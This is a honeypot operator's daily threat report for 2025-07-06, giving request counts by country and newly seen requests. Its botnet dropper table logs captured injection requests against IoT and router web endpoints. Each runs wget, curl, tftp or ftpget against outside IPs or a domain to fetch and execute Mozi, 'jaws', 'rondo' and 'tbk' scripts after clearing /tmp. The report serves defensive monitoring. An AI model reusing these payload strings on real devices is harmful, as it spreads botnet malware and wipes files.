Skip to main content
  1. Daily-Posts/

Report: 2025-07-06

·307 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-06
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 6 new requests that have never been observed before (these were added to the monitored request database.).

A total of 875 requests were recorded during the day, originating from 5 different countries, with a peak of 302 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
BRGermany
USDubai
USGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
123.245.32.35GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.245.32.35:51753/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
118.194.228.15GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.139.253.185GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
5.79.105.22POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F5.79.105.22%2Ftbk.sh%3B%20chmod%20777%20tbk.sh%3B%20sh%20tbk.sh%3B%20tftp%205.79.105.22%20-c%20get%20tbk1.sh%3B%20chmod%20777%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20tftp%20-r%20tbk2.sh%20-g%205.79.105.22%3B%20chmod%20777%20tbk2.sh%3B%20sh%20tbk2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%205.79.105.22%20tbk1.sh%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20rm%20-rf%20tbk.sh%20tbk1.sh%20tbk2.sh%20tbk1.sh HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1211\x00\x0E8j\x99\xC5\xE5Z \xD8\xC2\x00\x00\x00\x00\x00
1851\x00\x0E8l*\x0B\x94\xB1\x00\xAA\xDB\x00\x00\x00\x00\x00
1871\xC7=\xD7\xDA\xA1\xDB\x11\x15\x86\x0Ci\x81to\x97\x98\x98\x13\xFA\xBD7pf^\x0B\xE7\xB9\xF8\xE2\x8B\x83d
2301\x00\x0E8\xD6.N<\xD8w\xF5\x06\x00\x00\x00\x00\x00
2591\x00\x0E8\xB1\xE9\xBC(G\xCBrn\x00\x00\x00\x00\x00
2811GET http://xxx.xxx.xxx.xxx:80/admin/scripts/setup.php HTTP/1.0

country_iso_code
#

number_of_occurencecountry_iso_code
0302US
179SG
267CH
357HK
457NL
554DE
633FR
732RU
824JP
923BG
1022PL
1118GB
1213IN
1311AO
1411SC
1510MU
168IL
177CA
186ZA
196BR
205CN
214UA
224KR
234BE
243KZ
252AT
262IR
272AZ
282IE
292GH
301ID
311VN
321ES
331DK
341IT

Related

Report: 2025-07-05
·484 words
Repport Daily
Report: 2025-07-04
·350 words
Repport Daily
Report: 2025-07-03
·384 words
Repport Daily